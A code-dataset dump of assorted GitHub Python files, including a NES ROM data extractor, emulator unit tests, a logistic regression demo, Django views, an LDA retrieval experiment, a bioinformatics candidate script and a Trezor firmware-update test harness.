\"オーロラ王国(??)\",\n 0x00FD70: \"オーロラ王国(??)\",\n 0x00FD71: \"オーロラ王国(??)\",\n 0x00FD72: \"オーロラ王国(??)\",\n 0x00FD73: \"オーロラ王国(??)\",\n 0x00FD74: \"オーロラ王国(??)\",\n 0x00FD75: \"オーロラ王国(??)\",\n 0x00FD76: \"オーロラ王国(??)\",\n 0x00FD77: \"オーロラ王国(??)\",\n 0x00FD78: \"オーロラ王国(??)\",\n 0x00FD79: \"オーロラ王国(??)\",\n 0x00FD7A: \"オーロラ王国(??)\",\n 0x00FD7B: \"オーロラ王国(??)\",\n 0x00FD7C: \"オーロラ王国(??)\",\n }\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"マップ説明・マス説明\"),\n _ColumnStyle(caption=\"敵エンカウント確率\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for prg_rom_address in range(0x00FCE7, 0x00FD7C + 1):\n encounter_threshold_id = prg_rom_bytes[prg_rom_address]\n encounter_threshold = _get_encounter_threshold(prg_rom_bytes, encounter_threshold_id)\n encounter_rate = f\"{round(encounter_threshold / 0x100 * 100, 2):.02f}% ({encounter_threshold} / {0x100})\"\n row = [description_by_prg_rom_address[prg_rom_address], encounter_rate]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input_ines_file_path\", type=str)\n parser.add_argument(\"output_excel_file_path\", type=str)\n args = parser.parse_args()\n\n prg_rom_bytes = _read_prg_rom(args.input_ines_file_path)\n expected_prg_rom_crc = 0x29C61B41\n if binascii.crc32(prg_rom_bytes) != expected_prg_rom_crc:\n raise ValueError(\"Unexpected PRG ROM CRC\")\n\n workbook = openpyxl.Workbook()\n workbook.active.title = \"味方キャラステータス\"\n _fill_player_character(prg_rom_bytes, workbook.active)\n _fill_enemy(prg_rom_bytes, workbook.create_sheet(\"敵キャラステータス\"))\n _fill_map(prg_rom_bytes, workbook.create_sheet(\"マップ\"))\n _fill_world_map(prg_rom_bytes, workbook.create_sheet(\"ワールドマップ\"))\n _fill_enemy_group_pattern_list(prg_rom_bytes, workbook.create_sheet(\"敵グループパターンリスト\"))\n workbook.save(args.output_excel_file_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"applemon8080/jvq-analysis","sub_path":"jvqdump.py","file_name":"jvqdump.py","file_ext":"py","file_size_in_byte":73446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"72625409927","text":"import unittest\nfrom pyz80.iobus import *\nfrom unittest import mock\n\nclass TestIOBus(unittest.TestCase):\n def test_read(self):\n devices = [ mock.MagicMock(Device, name=\"device\" + str(n)) for n in range(0,4) ]\n def matches(n):\n def __inner(p):\n return p == n\n return __inner\n for n in range(0,4):\n devices[n].responds_to_port.side_effect = matches(n)\n devices[n].read.side_effect = lambda a : a + n\n\n UUT = IOBus(devices)\n\n for n in range(0,4):\n for a in range(0,256):\n for device in devices:\n device.reset_mock()\n self.assertEqual(a+n, UUT.read(n, a))\n devices[n].read.assert_called_once_with(a)\n for device in devices:\n if device != devices[n]:\n device.read.assert_not_called()\n\n def test_write(self):\n devices = [ mock.MagicMock(Device, name=\"device\" + str(n)) for n in range(0,4) ]\n def matches(n):\n def __inner(p):\n return p == n\n return __inner\n for n in range(0,4):\n devices[n].responds_to_port.side_effect = matches(n)\n\n UUT = IOBus(devices)\n\n for n in range(0,4):\n for a in range(0,256):\n for device in devices:\n device.reset_mock()\n UUT.write(n, a, mock.sentinel.data)\n devices[n].write.assert_called_once_with(a, mock.sentinel.data)\n for device in devices:\n if device != devices[n]:\n device.write.assert_not_called()\n\nclass TestDevice(unittest.TestCase):\n def test_responds_to_port(self):\n UUT = Device()\n for n in range(0,256):\n self.assertFalse(UUT.responds_to_port(n))\n\n def test_read(self):\n UUT = Device()\n for a in range(0,256):\n self.assertEqual(0x00, UUT.read(a))\n\n def test_write(self):\n UUT = Device()\n for a in range(0,256):\n UUT.write(a, mock.sentinel.data)\n","repo_name":"jamespbarrett/pyz80","sub_path":"tests/test_iobus.py","file_name":"test_iobus.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"18896582886","text":"\"\"\"Напишите программу, в которой вычисляется факториал числа.\nФакториалом n! числа n называется произведение всех чисел от единицы\nдо этого числа: n! = 1 Г 2 Г 3 Г … Г n. Число, для которого вычисляется\nфакториал, вводится пользователем с клавиатуры.\"\"\"\n\nn = input(\"Введите число: \")\n\nif not n.isdigit():\n print(\"Неверный ввод!\")\n exit()\n\nfactorial = 1\nfor i in range(1, int(n) + 1):\n factorial *= i\n\nprint(f\"{n}! = {factorial}\")\n","repo_name":"widgeton/PythonExercises","sub_path":"01.Acquaintance/01.07.py","file_name":"01.07.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"840902074","text":"#%%\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.datasets import make_blobs\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\n\n#%%\n# SUMMARY OF LOGISTIC REGRESSION MODEL:\n# ---------------------------------------------\n# 1. Create a model with LogisticRegression().\n# 2. Train the model with model.fit().\n# 3. Make predictions with model.predict().\n# 4. Validate the model with accuracy_score(). \n\n#%%\nX, y = make_blobs(centers=2, random_state=42)\n\nprint(f\"Labels: {y[:10]}\")\nprint(f\"Data: {X[:10]}\")\n# %%\nplt.scatter(X[:, 0], X[:, 1], c=y)\n\n# %%\n# Training and testing the model\nX_train, X_test, y_train, y_test = train_test_split(X,\n y, random_state=1, stratify=y)\n# %%\n# Instantiate a Logistic Regression Model\n\nclassifier = LogisticRegression(solver='lbfgs', random_state=1)\nclassifier\n\nLogisticRegression(C=1.0, class_weight=None, dual=False, fit_intercept=True,\n intercept_scaling=1, l1_ratio=None, max_iter=100,\n multi_class='warn', n_jobs=None, penalty='12',\n random_state=1, solver='lbfgs', tol=0.0001, verbose=0,\n warm_start=False)\n# %%\n# Train the Logistic Regression model\nclassifier.fit(X_train, y_train)\n\n#%%\n# Validate the logistic regression model\npredictions = classifier.predict(X_test)\npd.DataFrame({\"Prediction\": predictions, \"Actual\": y_test})\n# Evaluate the performance of the predictions\naccuracy_score(y_test, predictions)\n\n#%%\n# Classify if the next point is purple or yellow\nnew_data = np.array([[-2, 6]])\nplt.scatter(X[:, 0], X[:, 1], c=y)\nplt.scatter(new_data[0, 0], new_data[0, 1], c=\"r\", marker=\"o\", s=100)\nplt.show()\n# %%\npredictions = classifier.predict(new_data)\nprint(\"Classes are either 0 (purple) or 1 (yellow)\")\nprint(f\"The new point was classified as: {predictions}\")\n# %%\n","repo_name":"ines-tb/MachineLearning-analysis","sub_path":"logistic_regression/demo/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"1512611402","text":"from django.conf.urls.defaults import patterns, url, include\nfrom django.contrib import admin\n\nfrom transmogrifier.settings import MEDIA_ROOT\nfrom messportal import urls\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n \n url(r'^media/(?P.*)$',\n 'django.views.static.serve',\n { 'document_root': MEDIA_ROOT }),\n\n url(r'^admin/',\n include(admin.site.urls)\n ),\n\n url(r'^',\n include('transmogrifier.messportal.urls')\n ),\n )\n","repo_name":"s-ramaswamy/transmogrifier","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"3094468591","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.red),#Redirect from startpage\n url(r'^admin/', admin.site.urls),#standart adminpanel\n url(r'^index/', include('index.urls')),#index app\n url(r'^metrics/', include('metrics.urls')),#metrics app\n url(r'^auth/', include('auth.urls')),#auth app\n url(r'^books/', include('books.urls')),#books app\n]\n","repo_name":"ptera-py/hlaf","sub_path":"hlaf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"17363648724","text":"import pickle\nfrom pathlib import Path\nfrom typing import List\n\nimport click\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import Trainer\n\nfrom src.data_loading.load_augsburg15 import Augsburg15Dataset, collate_augsburg15_detection\nimport torch\n\nfrom src.models.soft_teacher import SoftTeacher\n\n\ndef _get_evaluation_data_loader(evaluation_dataset_name):\n root_directory, image_info_csv, dataset_type = Augsburg15Dataset.DATASET_MAPPING[evaluation_dataset_name]\n dataset = Augsburg15Dataset(\n root_directory=root_directory,\n image_info_csv=image_info_csv,\n transforms=[],\n dataset_type=dataset_type,\n )\n return DataLoader(\n dataset,\n batch_size=1,\n collate_fn=collate_augsburg15_detection,\n drop_last=True,\n num_workers=4\n )\n\n\ndef _make_validation_predictions(checkpoint_path, evaluation_dataset_name):\n data_loader = _get_evaluation_data_loader(evaluation_dataset_name)\n\n model = SoftTeacher.load_from_checkpoint(\n checkpoint_path,\n num_classes=Augsburg15Dataset.NUM_CLASSES,\n batch_size=1,\n train_dataset=None,\n validation_dataset=None,\n test_dataset=None,\n )\n model.eval()\n device = torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu')\n model.to(device)\n\n results = []\n\n for index, sample in enumerate(data_loader):\n image, target = sample\n\n image = image.to(device)\n\n result = model(image)\n results.append(\n (result[0]['boxes'].detach().cpu(), result[0]['labels'].detach().cpu(), result[0]['scores'].detach().cpu()))\n\n with open(checkpoint_path.parent / f'predictions_{evaluation_dataset_name}.pkl', 'wb') as file:\n pickle.dump(results, file)\n\n\ndef _run_test_set(checkpoint_path, evaluation_dataset_name):\n data_loader = _get_evaluation_data_loader(evaluation_dataset_name)\n\n model = SoftTeacher.load_from_checkpoint(\n checkpoint_path,\n num_classes=Augsburg15Dataset.NUM_CLASSES,\n batch_size=1\n )\n\n trainer = Trainer(\n gpus=1 if torch.cuda.is_available() else 0,\n precision=16,\n )\n results = trainer.test(\n model,\n dataloaders=data_loader,\n ckpt_path=checkpoint_path\n )\n with open(checkpoint_path.parent / f'results_{evaluation_dataset_name}.pkl', 'w') as file:\n file.write(str(results))\n\n\ndef _run_evaluation_for_experiment(\n ckpt_path: Path,\n evaluation_datasets: List[str]\n):\n ckpt_path = Path(ckpt_path)\n for evaluation_dataset in evaluation_datasets:\n _make_validation_predictions(ckpt_path, evaluation_dataset)\n _run_test_set(ckpt_path, evaluation_dataset)\n\n\n@click.command()\n@click.option(\n '--checkpoint_path',\n required=True,\n multiple=True,\n help='Which checkpoints to use for evaluation.'\n)\n@click.option(\n '--evaluation_dataset_group',\n default='evaluate_2016augsburg15',\n help='Which datasets to use for evaluation.'\n)\ndef run_evaluation_for_experiments(\n checkpoint_path,\n evaluation_dataset_group: str\n):\n if evaluation_dataset_group == 'evaluate_2016augsburg15':\n evaluation_datasets = [\n 'validation_synthesized_2016_augsburg15',\n 'test_synthesized_2016_augsburg15',\n 'test_synthesized_manual_set'\n ]\n elif evaluation_dataset_group == 'evaluate_2016+2018augsburg15_raw':\n evaluation_datasets = [\n 'validation_raw_2016_2018_augsburg15',\n 'test_raw_2016_2018_augsburg15',\n 'test_raw_manual_set'\n ]\n elif evaluation_dataset_group == 'evaluate_2016+2018augsburg15_synthesised':\n evaluation_datasets = [\n 'validation_synthesized_2016_2018_augsburg15',\n 'test_synthesized_2016_2018_augsburg15',\n 'test_synthesized_manual_set'\n ]\n else:\n raise ValueError(f'No such evaluation_dataset_group: {evaluation_dataset_group}')\n\n for ckpt_path in checkpoint_path:\n _run_evaluation_for_experiment(ckpt_path, evaluation_datasets)\n\n\nif __name__ == '__main__':\n run_evaluation_for_experiments()\n","repo_name":"MilesGrey/ssl-pollen-detection","sub_path":"run_evaluation.py","file_name":"run_evaluation.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"44942357341","text":"import os\nimport json\nimport pickle as pkl\nfrom collections import defaultdict, Counter\n\nimport numpy as np\nfrom tqdm import tqdm\n\nimport read_ap\nimport download_ap\n\nfrom gensim_corpus import GensimCorpus, BOWCorpus, TFIDFCorpus, ModelCorpus\nfrom gensim.models import LdaModel\nfrom gensim.matutils import kullback_leibler, sparse2full\n\nfrom trec import TrecAPI\n\nimport argparse\n\nclass LatentDirichletAllocation():\n \"\"\"\n This class implements latent dirichlet allocation using the gensim library.\n \"\"\"\n def __init__(self, corpus, num_topics=500, iterations=2000, passes=20, eval_every=None, embedding=\"bow\"):\n\n self.lda_model_path = \"./saved_models/gensim-lda-model-nt-{}.mm\".format(num_topics)\n self.lda_corpus_path = \"./saved_models/gensim-lda-nt-{}-corpus.crp\".format(num_topics)\n\n self.index_path = \"./saved_models/gensim-lda-model.pkl\"\n self.lda_corpus_path = \"./saved_models/gensim-lda-corpus.crp\"\n\n self.corpus = corpus\n self.num_topics = num_topics\n self.lda_corpus = []\n\n if os.path.exists(self.lda_model_path):\n print(\"LDA model already trained, loading from disk.\")\n self.model = LdaModel.load(self.lda_model_path)\n\n else:\n\n # Make a index to word dictionary.\n temp = corpus.dictionary[0] # This is only to \"load\" the dictionary.\n id2word = corpus.dictionary.id2token\n\n print(\"Training LDA model.\")\n self.model = LdaModel(\n corpus=list(corpus.get_corpus()),\n id2word=id2word,\n iterations=iterations,\n num_topics=num_topics,\n eval_every=eval_every\n )\n\n self.model.save(self.lda_model_path)\n\n self.lda_corpus = ModelCorpus(corpus.get_corpus(), self.model, path=self.lda_corpus_path, persist=True)\n\n self.lda_corpus_pers = [sparse2full(doc, self.num_topics) for doc in self.lda_corpus]\n\n def search(self, query):\n\n query_repr = read_ap.process_text(query)\n vec_query = self.corpus.dictionary.doc2bow(query_repr)\n lda_query = sparse2full(self.model[vec_query], self.num_topics)\n\n results = defaultdict(float)\n for doc_id, lda_doc_repr in zip(self.corpus.doc_ids, self.lda_corpus_pers):\n results[doc_id] = kullback_leibler(lda_query, lda_doc_repr)\n\n results = {k: v for k, v in sorted(results.items(), key=lambda item: item[1], reverse=True)}\n return list(results.items())\n\nif __name__ == \"__main__\":\n\n os.makedirs(\"results\", exist_ok=True)\n os.makedirs(\"saved_models/sim_temps\", exist_ok=True)\n os.makedirs(\"raw_output\", exist_ok=True)\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-embedding\", type=str, default=\"tfidf\", help=\"Embedding to use in training LDA.\")\n parser.add_argument(\"-num_topics\", type=int, default=500, help=\"Number of topics to use in training LDA.\")\n args = parser.parse_args()\n\n num_topics = args.num_topics\n # ensure dataset is downloaded\n download_ap.download_dataset()\n # pre-process the text\n docs_by_id = None\n docs_by_id = read_ap.get_processed_docs()\n\n gensim_corpus = GensimCorpus(docs_by_id, args.embedding)\n\n lda = LatentDirichletAllocation(gensim_corpus, eval_every=None, num_topics=num_topics, embedding=args.embedding)\n\n # read in the qrels\n qrels, queries = read_ap.read_qrels()\n\n overall_ser = {}\n\n print(\"Running LDA benchmark\")\n\n # Write results to trec-style file\n if not os.path.exists(\"lda_results.out\"):\n\n # collect results\n for qid in tqdm(qrels):\n query_text = queries[qid]\n\n results = lda.search(query_text)\n overall_ser[qid] = dict(results)\n\n results_lines = []\n for qid in overall_ser:\n for doc_id in overall_ser[qid]:\n results_lines.append(str(qid) + '\\tQO\\t' + doc_id + '\\t0\\t' + str(overall_ser[qid][doc_id]) + '\\tSTANDARD\\n')\n with open('./raw_output/lda_results.out', 'w') as f:\n f.writelines(results_lines)\n\n trec = TrecAPI('D:/Google Drive/Documenten/UVA/MSc AI/Information Retrieval 1/trec_eval-master/trec_eval.exe')\n metrics = trec.evaluate(test_file_name='datasets/ap/qrels.tsv', prediction_file_name='./raw_output/lda_results.out', metrics_to_capture={'map', 'ndcg'})\n\n # dump this to JSON\n # *Not* Optional - This is submitted in the assignment!\n with open(\"./results/lda-{}-topics.json\".format(num_topics), \"w\") as writer:\n json.dump(metrics, writer, indent=1)","repo_name":"davidvos/master-projects","sub_path":"information-retrieval/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"31211244358","text":"import logging\n\nfrom csm_api_client.service.gateway import APIError, APIGatewayClient\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass JobstatClient(APIGatewayClient):\n base_resource_path = 'statechecker/jobstat/'\n\n def get_all(self):\n \"\"\"Get all results from Job State Checker.\n\n Returns:\n A list of dictionaries where each dictionary pertains to a\n single job.\n\n Raises:\n APIError: if there is a failure querying the Job State Checker API\n or getting the required information from the response.\n \"\"\"\n err_prefix = 'Failed to get State Checker data'\n try:\n response = self.get('all').json()\n return response['jobstat']\n except APIError as err:\n raise APIError(f'{err_prefix}: {err}')\n except ValueError as err:\n raise APIError(f'{err_prefix} due to bad JSON in response: {err}')\n except KeyError as err:\n raise APIError(f'{err_prefix} due to missing {err} key in response.')\n","repo_name":"Cray-HPE/sat","sub_path":"sat/apiclient/jobstat.py","file_name":"jobstat.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"25315972081","text":"from django.shortcuts import render\nfrom models import Bride, Groom, Party,Venue\n\n# Create your views here.\n\ndef get_index(request):\n brides=Bride.objects.filter()\n bride=brides[0]\n grooms=Groom.objects.filter()\n groom=grooms[0]\n party=Party.objects.filter()\n venues=Venue.objects.filter()\n\n return render(request, 'homepage.html',{'bride':bride,'groom':groom,'party':party,'venues':venues})","repo_name":"Cvd2014/LeahWedding","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42423516753","text":"#!/usr/bin/env -S python3 -u\n# This is just a dirty playground, do not use.\n# It will be refactored over time.\n\nimport os\nimport sys\nimport serial\nimport time\nimport yaml\nimport datetime\n\nwith open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.safe_load(ymlfile)\n\nuhub_loction = cfg['usb_location'];\nuhub_port = cfg['usb_port'];\narduino_serial = cfg['arduino_serial'];\n\ndef trezor_poweroff():\n now();\n print(\"[hardware/usb] Turning power off...\");\n os.system((\"uhubctl -l {} -p {} -r 100 -a off > /dev/null\").format(uhub_loction, uhub_port));\n wait(3)\n\ndef trezor_poweron():\n now();\n print(\"[hardware/usb] Turning power on...\");\n os.system((\"uhubctl -l {} -p {} -a on > /dev/null\").format(uhub_loction, uhub_port));\n wait(3)\n\ndef touch(ser, location, action):\n now();\n print(\"[hardware/trezor] Touching the {} button by {}...\".format(location, action));\n ser.write((\"{} {}\\n\".format(location, action)).encode())\n\ndef wait(seconds):\n now();\n print(\"[software] Waiting for {} seconds...\".format(seconds));\n time.sleep(seconds);\n\ndef now():\n print(\"\\n[timestamp] {}\".format(datetime.datetime.now()));\n\ndef update_firmware(ser, version):\n if \"http\" in version:\n unofficial = True;\n trezorctlcmd = \"trezorctl firmware-update -s -u {} &\".format(version);\n elif \"bin\" in version:\n unofficial = True;\n trezorctlcmd = \"trezorctl firmware-update -s -f {} &\".format(version);\n else:\n unofficial = False;\n trezorctlcmd = \"trezorctl firmware-update -v {} &\".format(version);\n trezor_poweroff();\n if \"1.8\" in version:\n touch(ser, \"left\", \"press\");\n else:\n touch(ser, \"all\", \"press\");\n wait(2);\n trezor_poweron();\n wait(2);\n touch(ser, \"all\", \"unpress\");\n print(\"[software/trezorctl] Updating the firmware to {}...\".format(version));\n os.system(trezorctlcmd);\n wait(3);\n touch(ser, \"right\", \"click\");\n wait(20);\n if unofficial: touch(ser, \"right\", \"click\");\n wait(10);\n trezor_poweroff();\n trezor_poweron();\n if unofficial: touch(ser, \"right\", \"click\");\n if unofficial: wait(5);\n if unofficial: touch(ser, \"right\", \"click\");\n wait(5);\n os.system(\"trezorctl get-features|grep version\");\n\ndef main():\n ser = serial.Serial(arduino_serial, 9600)\n update_firmware(ser, sys.argv[1]);\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"mmahut/tpmb","sub_path":"scripts/updatefw.py","file_name":"updatefw.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"14850475972","text":"#!/usr/bin/python3\n\nimport json\nimport re\nfrom Bio.Data import CodonTable\nfrom Bio import SeqIO\nimport sys\nimport os\n\n\ndef make_bed_and_fasta(cand_list, frame_dic, genome, prot_dic, selection_file):\n bed_dic = {}\n fasta_dic = {}\n\n frame_color_dic = {}\n\n frame_color_dic[1] = \"255,26,26\"\n frame_color_dic[2] = \"26,26,255\"\n frame_color_dic[3] = \"45,185,45\"\n frame_color_dic[4] = \"172,0,230\"\n frame_color_dic[5] = \"230,115,0\"\n frame_color_dic[6] = \"0,230,184\"\n\n bed_temp = \"{0} {1} {2} {3} 0 {4} {1} {2} {5} 1 {6} 0 1 1\"\n track_description = ('track name=\"Candidates\" description=\"Candidate\"'\n 'visibility=2 itemRgb=\"On\"')\n translation_table = CodonTable.ambiguous_dna_by_id[11]\n\n start_regex = re.compile('|'.join(translation_table.start_codons))\n canno_start_regex = re.compile(\"ATG|ATB|ATD|ATH|ATK|ATM|ATN|ATR|ATS|ATV|\" +\n \"ATX|DTG|MTG|NTG|RTG|VTG|WTG|XTG\")\n as_regex = re.compile(\"[IL]\")\n for i, orf in enumerate(cand_list):\n species = orf.split(\"|\")[0]\n psms = prot_dic[\"SIHUMI\"][\"6frame\"][orf]\n\n strand = \"+\" if orf.split(\"|\")[3] == \"1\" else \"-\"\n start = int(orf.split(\"|\")[4].split(\"-\")[0])\n stop = int(orf.split(\"|\")[4].split(\"-\")[1])\n chrom = orf.split(\"|\")[1]\n protein_seq = frame_dic[orf].seq\n\n if strand == \"+\":\n nuc_seq = genome[species][chrom][start:stop].seq\n else:\n nuc_seq = genome[species][chrom][start:stop].seq.reverse_complement()\n trans = nuc_seq.translate()\n if str(trans) != str(protein_seq):\n print(\"error! 6frame not equal to genome\")\n print(orf)\n raise\n\n if \"*\" in trans:\n print(\"error! stop codon in translation\")\n print(orf)\n raise\n pep_starts = []\n\n pep_start_dic = {}\n for psm in psms:\n peptide = psm[\"pep\"]\n pep_seq_regex = as_regex.sub(\"[IL]\", peptide)\n starts = [m.start() for m in re.finditer(pep_seq_regex,\n str(protein_seq))]\n pep_start_dic[min(starts)] = peptide\n pep_starts += starts\n\n # start of startcodons\n canno_start_starts = []\n for m in re.finditer(canno_start_regex, str(nuc_seq)):\n if m.start() % 3 == 0:\n canno_start_starts.append(m.start())\n\n start_starts = []\n for m in re.finditer(start_regex, str(nuc_seq)):\n if m.start() % 3 == 0:\n start_starts.append(m.start())\n\n # calculate first start codon before mapped pep start\n min_start = min(pep_starts)\n '''\n for psm in psms:\n peptide = psm[\"pep\"]\n if peptide == pep_start_dic[min_start]:\n print(peptide)\n break\n '''\n # looks if a cannonical start exist if not take also alternatives,\n # if that does not exist 0 is assumed\n next_start_codon = max([start for start in canno_start_starts if start <=\n min_start * 3] + [-1])\n if next_start_codon < 0:\n next_start_codon = max([start for start in start_starts if start <=\n min_start * 3] + [0])\n '''\n print(next_start_codon)\n print(start_starts)\n print(canno_start_starts)\n print(min_start)\n '''\n if strand == \"+\":\n start = start + next_start_codon\n frame = start % 3 + 1\n else:\n stop = stop - next_start_codon\n frame = stop % 3 + 4\n rgb = frame_color_dic[frame]\n name = selection_file + \"_\" + str(i + 1)\n if strand == \"+\":\n cand_seq = genome[species][chrom][start:stop].seq.translate()\n else:\n cand_seq = genome[species][chrom][start:stop].seq.reverse_complement().translate()\n\n fasta_dic[name] = \">\" + name + \"\\n\" + str(cand_seq) + \"\\n\"\n if species not in bed_dic.keys():\n bed_dic[species] = [track_description]\n\n bed_dic[species].append(bed_temp.format(chrom, start, stop, name,\n strand, rgb, stop - start))\n\n return bed_dic, fasta_dic\n\n\ndef main():\n selection_cut_off = int(sys.argv[1])\n selection_file = \"nov_psm\" + str(selection_cut_off)\n\n with open(\"./parameters.json\", \"r\") as file_handle:\n data_dir = json.load(file_handle)['data_dir']\n\n with open(\"./SIHUMI_info_dic.json\", \"r\") as file_handle:\n SIHUMI_info_dic = json.load(file_handle)\n\n db_dir = data_dir + \"/dbs\"\n frame_path = db_dir + \"/SIHUMI_6frame.fasta\"\n frame_dic = SeqIO.index(frame_path, \"fasta\")\n\n genome_dir = data_dir + \"/genome\"\n genome = {}\n for genbank_file in os.listdir(genome_dir):\n if genbank_file.endswith(\".gbk\"):\n species = genbank_file.split(\".\")[0]\n genome_path = genome_dir + \"/\" + genbank_file\n genome[species] = SeqIO.to_dict(SeqIO.parse(genome_path, \"genbank\"))\n\n accu_data_dir = data_dir + \"/accumulated_data\"\n\n with open(accu_data_dir + \"/prot_dic.json\", \"r\") as file_handle:\n prot_dic = json.load(file_handle)\n\n cand_dir = data_dir + \"/candidates\"\n with open(cand_dir + \"/\" + selection_file + \"_list.json\", \"r\") as file_handler:\n cand_list = json.load(file_handler)\n\n bed_dic, fasta_dic = make_bed_and_fasta(cand_list, frame_dic, genome,\n prot_dic, selection_file)\n\n bed_dir = cand_dir + \"/bed_dir/\" + selection_file + \"/\"\n for species in SIHUMI_info_dic.keys():\n with open(bed_dir + species + \"_cand.bed\", \"w\") as file_handler:\n file_handler.write(\"\\n\".join(bed_dic[species]) + \"\\n\")\n\n blast_dir = cand_dir + \"/blast/{}/\".format(selection_file)\n for name, content in fasta_dic.items():\n with open(blast_dir + name + \".fasta\", \"w\") as file_handler:\n file_handler.write(content)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n'''\n'''\n","repo_name":"JohnBioinf/PROTMAP_scripts","sub_path":"candidates/make_bed_and_fasta.py","file_name":"make_bed_and_fasta.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71082188809","text":"from django.shortcuts import render,HttpResponseRedirect\nfrom .forms import LoginForm,TractorForm\nfrom .models import TractorDetail\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate,login,logout\nfrom .forms import MyUserCreationForm\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\ndef home_page(request):\n fm=TractorDetail.objects.all()\n return render(request,'app/tractorlist.html',{'form':fm})\n\ndef detail_page(request,pk):\n dt=TractorDetail.objects.filter(pk=pk)\n return render(request,'app/detail.html',{'data':dt})\n\ndef registration_page(request):\n if request.method==\"POST\":\n fm=MyUserCreationForm(request.POST)\n if fm.is_valid() :\n messages.success(request,'Congratulations You have registered ')\n fm.save()\n fm=MyUserCreationForm()\n else: \n fm=MyUserCreationForm()\n return render(request,'app/registration.html',{'form':fm})\n\ndef login_page(request):\n if request.method==\"POST\":\n fm=LoginForm(request,data=request.POST)\n if fm.is_valid():\n un=fm.cleaned_data['username']\n pa=fm.cleaned_data['password']\n User=authenticate(username=un,password=pa)\n if User is not None:\n login(request,User)\n return HttpResponseRedirect('/tractorreg/')\n else:\n fm=LoginForm()\n return render(request,'app/login.html',{'form':fm})\n \n@ login_required(login_url='/login/') \ndef tractorreg_page(request):\n if request.method==\"POST\":\n user=request.user\n fms=TractorForm(request.POST)\n if fms.is_valid():\n brand= fms.cleaned_data['brand']\n model_no= fms.cleaned_data['model_no']\n hp_category= fms.cleaned_data['hp_category']\n implements= fms.cleaned_data['implements']\n fm=TractorDetail(user=user,brand=brand,model_no=model_no,hp_category=hp_category,implements=implements)\n fm.save()\n messages.success(request,'Congratulations detail Updated Succefully ')\n fm=TractorForm()\n else:\n fm=TractorForm()\n return render(request,'app/tractorreg.html',{'form':fm,'active':'btn-primary'})\ndef logout_page(request):\n logout(request)\n return HttpResponseRedirect('/login/')\n\n ","repo_name":"yeshudeshmukh/tractorrecord","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
